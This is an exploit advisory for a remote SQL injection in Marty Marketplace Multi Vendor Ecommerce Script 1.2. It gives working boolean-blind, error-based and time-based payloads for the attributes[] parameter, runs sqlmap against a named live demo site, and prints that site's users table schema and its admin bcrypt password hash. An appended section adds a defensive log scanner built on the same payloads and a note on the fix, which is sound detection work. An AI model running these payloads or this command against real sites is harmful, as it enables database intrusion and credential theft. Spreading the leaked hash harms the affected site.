Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection
Marty Marketplace Multi Vendor Ecommerce Script version 1.2 suffers from a remote SQL injection vulnerability.
Author    : CraCkEr
Website   : sangvish.com
Vendor    : SangVish Technologies
Software  : Marty Marketplace Multi Vendor Ecommerce Script v1.2
            (Open Source Marketplace PHP script for eCommerce marketplace platforms in the market)
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear
CryptoJob (Twitter) twitter.com/CryptozJob
Special Greetz to The Lebanese National Basketball Team for the results of the FIBA Asia Cup

© CraCkEr 2022

GET parameter 'attributes[]' is vulnerable

---
Parameter: attributes[] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)
---

Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6

[+] Starting the Attack

sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch

[+] fetching current database

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[INFO] retrieved: 'garudan_buy2marty'
current database: 'garudan_buy2marty'

[+] fetching tables for database: 'garudan_buy2marty'

Database: garudan_buy2marty
[105 tables]

[+] fetching columns for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[15 columns]
+-------------------+---------------------+
| Column            | Type                |
+-------------------+---------------------+
| avatar_id         | int(10) unsigned    |
| created_at        | timestamp           |
| email             | varchar(191)        |
| email_verified_at | timestamp           |
| first_name        | varchar(191)        |
| id                | bigint(20) unsigned |
| last_login        | timestamp           |
| last_name         | varchar(191)        |
| manage_supers     | tinyint(1)          |
| password          | varchar(191)        |
| permissions       | text                |
| remember_token    | varchar(100)        |
| super_user        | tinyint(1)          |
| updated_at        | timestamp           |
| username          | varchar(60)         |
+-------------------+---------------------+

[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[1 entry]
+----+----------+--------------------------------------------------------------+------------+-------------+
| id | username | password                                                     | super_user | permissions |
+----+----------+--------------------------------------------------------------+------------+-------------+
| 1  | admin    | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1          | NULL        |
+----+----------+--------------------------------------------------------------+------------+-------------+

Possible algorithms: bcrypt $2*$, Blowfish (Unix)

[-] Done
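
A defensive check for the parameter described above, added here as an example and not part of the original advisory: it scans web access log lines for `attributes[]` values that are not plain integers and labels the three payload types the sqlmap output lists. The combined log format, the sample lines and the function names (`classify`, `scan`, `sample_line`) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Markers for the three payload types listed in the advisory's sqlmap output.
TECHNIQUES = [
    ("time-based blind", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based", re.compile(r"\bGTID_SUBSET\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\bCASE\s+WHEN\b", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # assumed combined log format

def classify(value):
    """Return None for a plain integer id, otherwise a label for the value."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-numeric value"

def scan(log_lines):
    """Return (line_number, label, decoded_value) for each suspicious attributes[] value."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        # parse_qsl percent-decodes keys and values, so attributes%5B%5D matches too.
        for key, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
            if key == "attributes[]" and (label := classify(value)):
                findings.append((number, label, value))
    return findings

def sample_line(value):
    """Build one constructed access-log line carrying `value` in attributes[]."""
    return ('203.0.113.7 - - [01/Aug/2022:10:00:00 +0000] '
            f'"GET /products?attributes%5B%5D={quote(value)} HTTP/1.1" 200 512')

# Constructed sample log: one normal request, the three advisory payloads, one stray quote.
SAMPLE_LOG = [sample_line(v) for v in (
    "6",
    "(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))",
    "6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)",
    "6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)",
    "6'",
)]

if __name__ == "__main__":
    for number, label, value in scan(SAMPLE_LOG):
        print(f"line {number}: {label}: {value}")
```

A hit here means a non-integer value reached the request handler; the application-side fix is to cast each `attributes[]` element to an integer and pass it to the database as a bound parameter.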